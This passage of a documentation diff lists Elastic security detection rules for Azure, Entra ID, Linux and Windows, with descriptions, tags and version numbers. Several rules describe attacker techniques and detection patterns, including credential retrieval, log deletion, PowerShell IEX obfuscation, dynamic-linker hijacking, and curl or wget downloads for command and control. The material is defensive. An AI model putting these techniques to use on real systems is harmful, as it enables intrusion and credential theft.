Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |111 -|<> |In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 - -|<> |Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |107 +|<> |Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 -|<> |Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |107 +|<> |Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |None |108 -|<> |Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Execution], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 -|<> |Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Discovery], [Resources: Investigation Guide] |None |105 +|<> |Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Discovery], [Resources: Investigation Guide] |None |106 -|<> |Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |107 +|<> |Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |108 -|<> |Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Execution], [Resources: Investigation Guide] |None |105 +|<> |Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Execution], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |3 +|<> |Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |4 -|<> |Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Collection], [Resources: Investigation Guide] |None |106 +|<> |Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Persistence], [Resources: Investigation Guide] |None |107 -|<> |Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |105 +|<> |Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: Azure], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 +|<> |Identifies potential full network packet capture in Azure. Packet Capture is an Azure Network Watcher feature that can be used to inspect network traffic. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |[Domain: Cloud], [Data Source: Azure], [Tactic: Credential Access], [Resources: Investigation Guide] |None |107 -|<> |Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |105 +|<> |Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies modifications to a Key Vault in Azure. The Key Vault is a service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. Because this data is sensitive and business critical, access to key vaults should be secured to allow only authorized applications and users. This is a New Terms rule that detects when this activity hasn't been seen by the user in a specified time frame. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Activity Logs], [Tactic: Impact], [Use Case: Configuration Audit], [Resources: Investigation Guide] |None |107 |<> |Identifies secrets, keys, or certificates retrieval operations from Azure Key Vault by a user principal that has not been seen previously doing so in a certain amount of days. Azure Key Vault is a cloud service for securely storing and accessing secrets, keys, and certificates. Unauthorized or excessive retrievals may indicate potential abuse or unauthorized access attempts. |[Domain: Cloud], [Domain: Storage], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Platform Logs], [Data Source: Azure Key Vault], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies when events are deleted in Azure Kubernetes. Kubernetes events are objects that log any state changes. Example events are a container creation, an image pull, or a pod scheduling on a node. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Impact], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Asset Visibility], [Tactic: Impact], [Resources: Investigation Guide] |None |106 -|<> |Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 +|<> |Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |105 +|<> |Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |106 |<> |Detects when Azure OpenAI requests result in zero response length, potentially indicating issues in output handling that might lead to security exploits such as data leaks or code execution. This can occur in cases where the API fails to handle outputs correctly under certain input conditions. |[Domain: LLM], [Data Source: Azure OpenAI], [Data Source: Azure Event Hubs], [Use Case: Insecure Output Handling], [Resources: Investigation Guide] |None |3 -|<> |Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |107 +|<> |Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Persistence] |None |108 + +|<> |Identifies when a user is assigned a built-in administrator role in Azure RBAC (Role-Based Access Control). These roles provide significant privileges and can be abused by attackers for lateral movement, persistence, or privilege escalation. The privileged built-in administrator roles include Owner, Contributor, User Access Administrator, Azure File Sync Administrator, Reservations Administrator, and Role Based Access Control Administrator. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 + +|<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |106 -|<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |105 +|<> |Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 -|<> |Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |105 +|<> |Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |106 + +|<> |Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Data Source: Azure], [Data Source: Azure Activity Logs], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 |<> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 @@ -558,6 +564,8 @@ and their rule type is `machine_learning`. |<> |Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313 +|<> |This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies attempts to export a registry hive which may contain credentials using the Windows reg.exe tool. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Data Source: Sysmon], [Data Source: Crowdstrike] |None |315 |<> |Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |105 @@ -568,7 +576,7 @@ and their rule type is `machine_learning`. |<> |Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 -|<> |This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |17 +|<> |This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |18 |<> |Generates a detection alert for each CrowdStrike alert written to the configured indices. Enabling this rule allows you to immediately begin investigating CrowdStrike alerts in the app. |[Data Source: Crowdstrike], [Use Case: Threat Detection], [Resources: Investigation Guide], [Promotion: External Alerts] |8.18.0 |2 @@ -576,6 +584,8 @@ and their rule type is `machine_learning`. |<> |This rule detects the use of the `curl` command-line tool with SOCKS proxy options, launched from an unusual parent process. Attackers may use `curl` to establish a SOCKS proxy connection to bypass network restrictions and exfiltrate data or communicate with C2 servers. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 +|<> |This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) error level audit event. The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 |<> |Identifies the occurrence of a CyberArk Privileged Access Security (PAS) non-error level audit event which is recommended for monitoring by the vendor. The event.code correlates to the CyberArk Vault Audit Action Code. |[Data Source: CyberArk PAS], [Use Case: Log Auditing], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |105 @@ -642,11 +652,11 @@ and their rule type is `machine_learning`. |<> |Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command by accessing and indexing the string representation of method references. This obfuscation technique uses constructs like ''.IndexOf.ToString() to expose method metadata as a string, then extracts specific characters through indexed access and joins them to form IEX, bypassing static keyword detection and evading defenses such as AMSI. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |None |5 -|<> |This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |104 +|<> |This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |105 |<> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |213 -|<> |Detects the creation or modification of files related to the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 +|<> |Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |7 |<> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |111 @@ -672,7 +682,11 @@ and their rule type is `machine_learning`. |<> |Generates a detection alert each time an Elastic Defend alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts. |[Data Source: Elastic Defend], [Resources: Investigation Guide] |None |108 -|<> |Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Resources: Investigation Guide] |None |4 +|<> |Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate 